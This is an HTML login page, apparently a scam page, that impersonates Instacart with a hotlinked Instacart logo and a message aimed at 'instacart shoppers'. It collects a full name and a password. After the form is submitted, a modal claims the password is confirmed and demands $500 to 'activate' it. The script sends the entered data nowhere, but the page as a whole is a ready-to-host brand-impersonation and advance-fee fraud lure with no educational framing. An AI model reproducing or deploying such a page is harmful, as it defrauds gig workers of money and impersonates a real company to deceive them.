<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Page</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: Arial, sans-serif;
        }

        body {
            min-height: 100vh;
            min-height: -webkit-fill-available;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #f3f4f6;
            padding: 1rem;
        }

        html {
            height: -webkit-fill-available;
        }

        .login-card {
            background: white;
            padding: clamp(1rem, 5vw, 2rem);
            border-radius: 10px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            width: min(100%, 400px);
            margin: auto;
        }

        .logo-container {
            text-align: center;
            margin-bottom: clamp(1rem, 4vw, 2rem);
        }

        .logo {
            height: clamp(40px, 10vw, 80px);
            width: auto;
            object-fit: contain;
        }

        .form-group {
            margin-bottom: clamp(1rem, 3vw, 1.5rem);
        }

        label {
            display: block;
            margin-bottom: 0.5rem;
            color: #374151;
            font-size: clamp(0.875rem, 2vw, 1rem);
            font-weight: 500;
        }

        input {
            width: 100%;
            padding: clamp(0.5rem, 2vw, 0.75rem);
            border: 1px solid #d1d5db;
            border-radius: 6px;
            font-size: clamp(0.875rem, 2vw, 1rem);
            transition: border-color 0.2s, box-shadow 0.2s;
        }

        input:focus {
            outline: none;
            border-color: #2563eb;
            box-shadow: 0 0 0 3px rgba(37, 99, 235, 0.1);
        }

        input::placeholder {
            color: #9ca3af;
        }

        .error-message {
            color: #dc2626;
            font-size: clamp(0.75rem, 1.5vw, 0.875rem);
            margin-top: 0.25rem;
            display: none;
        }

        button {
            width: 100%;
            padding: clamp(0.5rem, 2vw, 0.75rem);
            background-color: #2563eb;
            color: white;
            border: none;
            border-radius: 6px;
            font-size: clamp(0.875rem, 2vw, 1rem);
            font-weight: 500;
            cursor: pointer;
            transition: background-color 0.2s;
        }

        button:hover {
            background-color: #1d4ed8;
        }

        button:focus {
            outline: none;
            box-shadow: 0 0 0 3px rgba(37, 99, 235, 0.5);
        }

        /* Modal Styles */
        .modal {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 1000;
            animation: fadeIn 0.3s ease-out;
            padding: 1rem;
        }

        .modal-content {
            position: relative;
            background-color: white;
            margin: min(15vh, 15%) auto;
            padding: clamp(1.5rem, 4vw, 2rem);
            border-radius: 10px;
            width: min(90%, 500px);
            text-align: center;
            animation: slideIn 0.3s ease-out;
        }

        .modal-message {
            font-size: clamp(1rem, 2.5vw, 1.1rem);
            line-height: 1.6;
            margin-bottom: clamp(1rem, 4vw, 1.5rem);
            color: #374151;
            word-wrap: break-word;
        }

        .modal-close {
            background-color: #2563eb;
            color: white;
            padding: clamp(0.5rem, 2vw, 0.75rem) clamp(1rem, 4vw, 2rem);
            border: none;
            border-radius: 6px;
            cursor: pointer;
            font-size: clamp(0.875rem, 2vw, 1rem);
            transition: background-color 0.2s;
            width: auto;
            min-width: 100px;
        }

        .modal-close:hover {
            background-color: #1d4ed8;
        }

        @keyframes fadeIn {
            from { opacity: 0; }
            to { opacity: 1; }
        }

        @keyframes slideIn {
            from { transform: translateY(-20px); opacity: 0; }
            to { transform: translateY(0); opacity: 1; }
        }

        /* Landscape orientation adjustments */
        @media (max-height: 600px) and (orientation: landscape) {
            body {
                align-items: flex-start;
                padding: 1rem;
            }

            .modal-content {
                margin: 5vh auto;
            }
        }

        /* Touch device optimizations */
        @media (hover: none) {
            input, button {
                font-size: 16px; /* Prevents zoom on iOS */
            }
            
            input {
                padding: 12px; /* Larger touch target */
            }
            
            button {
                padding: 12px;
            }
        }

        /* High resolution screens */
        @media (min-width: 1920px) {
            .login-card {
                max-width: 450px;
            }

            .modal-content {
                max-width: 600px;
            }
        }
    </style>
</head>
<body>
    <div class="login-card">
        <div class="logo-container">
            <!-- Replace the src with your logo path -->
            <img src="https://brittainladd.com/wp-content/uploads/2023/09/Instacart-Logo-scaled.jpg" alt="Company Logo" class="logo">
        </div>
        
        <form id="loginForm" onsubmit="return validateForm(event)">
            <div class="form-group">
                <label for="fullName">Full Name</label>
                <input 
                    type="text" 
                    id="fullName" 
                    name="fullName" 
                    placeholder="Enter your full name"
                    required
                    autocomplete="name"
                >
                <div class="error-message" id="fullNameError">Full name is required</div>
            </div>

            <div class="form-group">
                <label for="password">Password</label>
                <input 
                    type="password" 
                    id="password" 
                    name="password" 
                    placeholder="Enter your password"
                    required
                    autocomplete="new-password"
                >
                <div class="error-message" id="passwordError">Password is required</div>
            </div>

            <div class="form-group">
                <label for="confirmPassword">Confirm Password</label>
                <input 
                    type="password" 
                    id="confirmPassword" 
                    name="confirmPassword" 
                    placeholder="Confirm your password"
                    required
                    autocomplete="new-password"
                >
                <div class="error-message" id="confirmPasswordError">Passwords do not match</div>
            </div>

            <button type="submit">Login</button>
        </form>
    </div>

    <!-- Activation Modal -->
    <div id="activationModal" class="modal">
        <div class="modal-content">
            <div class="modal-message">
                Activate your password to login into the account<br>
                Your password is confirmed ✅<br><br>
                To activate the password cost 💲 $500<br>
                (instacart shoppers)
            </div>
            <button class="modal-close" onclick="closeModal()">OK</button>
        </div>
    </div>

    <script>
        // Prevent body scrolling when modal is open
        function toggleBodyScroll(disable) {
            document.body.style.overflow = disable ? 'hidden' : '';
        }

        function validateForm(event) {
            event.preventDefault();
            
            document.querySelectorAll('.error-message').forEach(error => {
                error.style.display = 'none';
            });

            const fullName = document.getElementById('fullName').value;
            const password = document.getElementById('password').value;
            const confirmPassword = document.getElementById('confirmPassword').value;
            let isValid = true;

            if (!fullName.trim()) {
                document.getElementById('fullNameError').style.display = 'block';
                isValid = false;
            }

            if (!password) {
                document.getElementById('passwordError').style.display = 'block';
                isValid = false;
            }

            if (password !== confirmPassword) {
                document.getElementById('confirmPasswordError').style.display = 'block';
                isValid = false;
            }

            if (isValid) {
                showModal();
            }

            return false;
        }

        function showModal() {
            document.getElementById('activationModal').style.display = 'block';
            toggleBodyScroll(true);
        }

        function closeModal() {
            document.getElementById('activationModal').style.display = 'none';
            toggleBodyScroll(false);
        }

        // Close modal when clicking outside
        window.onclick = function(event) {
            const modal = document.getElementById('activationModal');
            if (event.target == modal) {
                closeModal();
            }
        }

        // Handle mobile viewport height issues
        const vh = window.innerHeight * 0.01;
        document.documentElement.style.setProperty('--vh', `${vh}px`);

        window.addEventListener('resize', () => {
            const vh = window.innerHeight * 0.01;
            document.documentElement.style.setProperty('--vh', `${vh}px`);
        });
    </script>
</body>
</html>